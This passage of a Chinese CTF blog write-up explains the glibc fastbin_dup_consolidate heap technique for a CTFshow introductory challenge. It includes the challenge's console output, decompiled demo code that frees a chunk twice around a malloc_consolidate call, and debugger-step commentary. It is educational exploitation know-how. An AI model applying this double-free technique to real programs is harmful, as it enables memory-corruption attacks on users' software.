src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"441\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-48-1024x441.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-773\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u770b\u770b\u6f14\u793a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>faetong@faetong-virtual-machine:~\/pwnit$ nc pwn.challenge.ctf.show 28199\n    \u2584\u2584\u2584\u2584   \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584  \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584            \u2584\u2584                           \n  \u2588\u2588\u2580\u2580\u2580\u2580\u2588  \u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580  \u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580            \u2588\u2588                           \n \u2588\u2588\u2580          \u2588\u2588     \u2588\u2588        \u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584  \u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584   \u2584\u2588\u2588\u2588\u2588\u2584  \u2588\u2588      \u2588\u2588\n \u2588\u2588           \u2588\u2588     \u2588\u2588\u2588\u2588\u2588\u2588\u2588   \u2588\u2588\u2584\u2584\u2584\u2584 \u2580  \u2588\u2588\u2580   \u2588\u2588  \u2588\u2588\u2580  \u2580\u2588\u2588 \u2580\u2588  \u2588\u2588  \u2588\u2580\n \u2588\u2588\u2584          \u2588\u2588     \u2588\u2588         \u2580\u2580\u2580\u2580\u2588\u2588\u2584  \u2588\u2588    \u2588\u2588  \u2588\u2588    \u2588\u2588  \u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 \n  \u2588\u2588\u2584\u2584\u2584\u2584\u2588     \u2588\u2588     \u2588\u2588        \u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588  \u2588\u2588    \u2588\u2588  \u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580  \u2580\u2588\u2588  \u2588\u2588\u2580 \n    \u2580\u2580\u2580\u2580      \u2580\u2580     \u2580\u2580         \u2580\u2580\u2580\u2580\u2580\u2580   \u2580\u2580    \u2580\u2580    \u2580\u2580\u2580\u2580     \u2580\u2580  \u2580\u2580  \n    * *************************************                           \n    * Classify: CTFshow --- PWN --- \u5165\u95e8                              \n    * Type  : Heap_Exploitation                                       \n    * Site  : https:\/\/ctf.show\/                                       \n    * Hint  : Fastbin_dup_consolidate                                 \n    * *************************************                           \n\u7533\u8bf7\u4e24\u4e2a fastbin \u8303\u56f4\u5185\u7684 chunk: p1=0xcdd010 p2=0xcdd030\n\u5148 free p1\n\u53bb\u7533\u8bf7 largebin \u5927\u5c0f\u7684 chunk\uff0c\u89e6\u53d1 malloc_consolidate(): p3=0xcdd050\n\u56e0\u4e3a malloc_consolidate(), p1 \u4f1a\u88ab\u653e\u5230 unsorted bin \u4e2d\n\u8fd9\u65f6\u5019 p1 \u4e0d\u5728 fastbin \u94fe\u8868\u7684\u5934\u90e8\u4e86\uff0c\u6240\u4ee5\u53ef\u4ee5\u518d\u6b21 free p1 \u9020\u6210 double free\n\u73b0\u5728 fastbin \u548c unsortedbin \u4e2d\u90fd\u653e\u7740 p1 \u7684\u6307\u9488\uff0c\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5 malloc \u4e24\u6b21\u90fd\u5230 p1: 0xcdd010 0xcdd010\n$\n<\/code><\/pre>\n\n\n\n<p id=\"ua6c2101d\">\u4f3c\u4e4e\u4e5f\u662f\u53bb\u6784\u9020\u4e00\u4e2adouble free\u4f46\u662f\u7528\u7684\u65b9\u6cd5\u4e0d\u540c\uff0c\u5148\u770b\u770b\u4eba\u673a\u7684\u8bb2\u89e3\u7136\u540e\u6765\u8c03\u8bd5\u4e00\u4e0b\u7a0b\u5e8f<\/p>\n\n\n\n<p id=\"u64557898\">\u9996\u5148\u662fFastbin_dup_consolidate\u7684\u76ee\u7684<\/p>\n\n\n\n<p id=\"u67907dab\">\u8ba9\u540c\u4e00\u4e2a fastbin chunk\uff08\u4f8b\u5982 p1\uff09 <strong>\u65e2\u51fa\u73b0\u5728 fastbin \u94fe\u8868\u91cc\uff0c\u4e5f\u51fa\u73b0\u5728 unsorted bin \u91cc<\/strong>\uff0c\u4ece\u800c\u5728\u540e\u7eed <code>malloc()<\/code> \u65f6\u53ef\u4ee5\u8fde\u7eed\u4e24\u6b21\u5206\u914d\u5230\u540c\u4e00\u5757\u5185\u5b58\uff0c\u5b9e\u73b0 <strong>double malloc \u2192 double free \u2192 \u4efb\u610f\u5199 \/ \u5806\u5e03\u5c40\u63a7\u5236<\/strong>\u3002<\/p>\n\n\n\n<p id=\"udf3d93fa\">\u73b0\u5728\u8fd9\u4e2achunk\u4e0d\u4ec5\u4ec5\u51fa\u73b0\u5728fastbin\u91cc\uff0c\u8fd8\u51fa\u73b0\u5728<strong>unsorted bin\u91cc\uff0c<\/strong>malloc\u4e4b\u540e\u5c06\u4f1a\u8fde\u7eed\u4e24\u6b21\u5206\u914d\u5230\u540c\u4e00\u7247\u5185\u5b58<\/p>\n\n\n\n<p id=\"u6c229fc9\">\u56e0\u4e3a\u9700\u8981\u51fa\u53d1 malloc_consolidate() \uff0c\u8fd9\u662f\u4ec0\u4e48\u529f\u80fd\u5462<\/p>\n\n\n\n<p id=\"u242c1f29\">\u5f53\u89e6\u53d1\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>malloc()<\/code> \u9700\u8981\u4ece top chunk \u62ff\u7a7a\u95f4\u4f46\u4e0d\u591f<\/li>\n\n\n\n<li>\u6216\u8005 <code>malloc_trim<\/code><\/li>\n\n\n\n<li>\u6216\u8005\u7533\u8bf7\u4e00\u4e2a <em>\u8fc7\u5927 chunk<\/em>\uff08\u89e6\u53d1\u6574\u7406\uff09<\/li>\n<\/ul>\n\n\n\n<p id=\"u824de5da\">\u4f1a\u5bf9 <strong>fastbin \u8fdb\u884c\u5408\u5e76\uff08consolidate\uff09<\/strong><br>\u2192 fastbin \u91cc\u6240\u6709 chunk \u4f1a\u88ab\u53d6\u51fa\u5e76\u653e\u8fdb unsorted bin\u3002<\/p>\n\n\n\n<p id=\"u23257687\">ok\uff0c\u63a5\u4e0b\u6765\u770b\u770b\u4ee3\u7801\u662f\u600e\u4e48\u5b9e\u73b0\u7684(\u5e26\u6ce8\u91ca)<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>void __cdecl demo()\n{\n  char *p1; \/\/ &#91;rsp+8h] &#91;rbp-28h]\n  char *p2; \/\/ &#91;rsp+10h] &#91;rbp-20h]\n  void *p3; \/\/ &#91;rsp+18h] &#91;rbp-18h]\n  _QWORD *p4; \/\/ &#91;rsp+20h] &#91;rbp-10h]\n  char *p5; \/\/ &#91;rsp+28h] &#91;rbp-8h]\n\n  \/\/\u521b\u5efachunk&#91;0]\n  p1 = (char *)malloc(0x10u);\t\n  strcpy(p1, \"AAAAAAAA\");\n\n  \/\/\u521b\u5efachunk&#91;1]\n  p2 = (char *)malloc(0x10u);\n  strcpy(p2, \"BBBBBBBB\");\n  fprintf(stderr, &amp;format_, p1, p2);\n  fwrite(&amp;ptr_, 1u, 0xCu, stderr);\n\n  \/\/free\u6389chunk&#91;0]\n  free(p1);\n\n  \/\/\u7533\u8bf7\u4e00\u4e2a\u66f4\u5927\u7684chunk&#91;2],\u89e6\u53d1 malloc_consolidate()\n  \/\/ glibc \u4f1a\u628a fastbin \u91cc\u7684 chunk\uff08\u5305\u62ec p1\uff09\u5168\u90e8\u642c\u5230 unsorted bin\n  p3 = malloc(0x400u);\n  fprintf(stderr, &amp;format__0, p3);\n  fwrite(&amp;ptr__0, 1u, 0x3Eu, stderr);\n\n  \/\/ \u6b64\u65f6 p1 \u5df2\u7ecf\u5728 unsorted bin \u4e2d\uff0c\u4e0d\u5728 fastbin \u5934\u90e8\uff0c\n  \/\/ \u56e0\u6b64 free(p1) \u4e0d\u4f1a\u89e6\u53d1 double free \u68c0\u6d4b\uff01\n  \/\/ free(p1) \u4f1a\u628a p1 \u518d\u6b21\u653e\u5165 fastbin\n  free(p1);\n  fwrite(&amp;ptr__1, 1u, 0x5Fu, stderr);\n\n  \/\/\u7533\u8bf7\u5c0f\u5757\uff0c\u8fd4\u56dep1\n  p4 = malloc(0x10u);\n  *p4 = 0x43434343434343LL;\n\n  \/\/\u7533\u8bf7\u5c0f\u5757\uff0c\u540c\u6837\u8fd4\u56dep1\n  p5 = (char *)malloc(0x10u);\n  strcpy(p5, \"DDDDDDDD\");\n  fprintf(stderr, &amp;format__1, p4, p5);\n}<\/code><\/pre>\n\n\n\n<p id=\"u88b85f34\">\u73b0\u5728\u6765\u8c03\u8bd5\u7a0b\u5e8f<\/p>\n\n\n\n<p id=\"u092a9821\">\u5728demo\u6253\u4e2a\u65ad\u70b9run\u4e00\u4e0b\uff0c\u6211\u4eec\u628a\u4e24\u4e2amalloc\u6267\u884c\u5b8c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-49.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"997\" height=\"764\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-49.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-774\"  sizes=\"auto, (max-width: 997px) 100vw, 997px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u63a5\u4e0b\u6765free chunk[0]<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-50-1024x178.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"178\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-50-1024x178.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-775\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-51.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"977\" height=\"886\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-51.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-776\"  sizes=\"auto, (max-width: 977px) 100vw, 977px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-52.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"589\" height=\"611\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-52.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-777\"  sizes=\"auto, (max-width: 589px) 100vw, 589px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u62e2f45a\">chunk[0]\u5df2\u7ecf\u8fdb\u5165fastbin<\/p>\n\n\n\n<p id=\"u801b1e92\">\u63a5\u4e0b\u6765\u662f\u7533\u8bf7\u4e00\u4e2a\u66f4\u5927\u7684chunk[3]<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-53.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"916\" height=\"938\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-53.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-778\"  sizes=\"auto, (max-width: 916px) 100vw, 916px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-54-1024x360.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"360\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-54-1024x360.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-779\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u5947\u602a\uff0c\u4e3a\u4ec0\u4e48\u88ab\u5f52\u5728smallbin\u91cc\u9762\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-55-1024x565.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"565\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-55-1024x565.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-780\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u4f46\u662f\u603b\u5f52\u662f\u4e0d\u5728fastbin\u91cc\u9762\u7684\uff0c\u6240\u4ee5\u7ee7\u7eedfree(p1)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-56-1024x718.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"718\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-56-1024x718.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-781\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u867d\u7136\u662f\u5728smollbin\u4f46\u662f\u4e5f\u662f\u5f62\u6210\u4e86double free<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-57.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"981\" height=\"749\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-57.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-782\"  sizes=\"auto, (max-width: 981px) 100vw, 981px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u274fd974\">\u63a5\u4e0b\u6765\u5c31\u662f\u7533\u8bf7\u56de\u4e24\u4e2a\u5c0f\u5757<\/p>\n\n\n\n<p id=\"ua09b329d\">\u9996\u5148\u662f\u6536\u56defastbin\u4e2d\u7684chunk[0]<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-58-1024x941.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"941\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-58-1024x941.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-783\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u4e0b\u65b9\u53ef\u4ee5\u770b\u5230\u88ab\u6536\u56de\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-59-1024x644.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"644\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-59-1024x644.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-784\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u63a5\u4e0b\u6765\u662f\u6536\u56desmollbin(\u539f\u672c\u662funstored bin)<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-60.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"872\" height=\"832\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-60.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-785\"  sizes=\"auto, (max-width: 872px) 100vw, 872px\" \/><\/div><\/figure>\n\n\n\n<p><br>\u53ef\u4ee5\u53d1\u73b0\u5df2\u7ecf\u88ab\u7533\u8bf7\u56de\u6765\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-61.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"384\" height=\"606\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-61.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-786\"  sizes=\"auto, (max-width: 384px) 100vw, 384px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-62-1024x395.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"395\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-62-1024x395.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-787\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u7e335de2\">\u53ef\u4ee5\u770b\u5230\u91cc\u9762\u7684\u5185\u5bb9\u4e5f\u662f\u88ab\u8986\u76d6\u4e86<\/p>\n\n\n\n<p id=\"uec9839a3\">ok,\u62ff\u4e2aflag<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-63-1024x946.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"946\" data-original=\"http:\/\/lycoreco.cn\/wp-content\/uploads\/2025\/12\/image-63-1024x946.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-788\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" 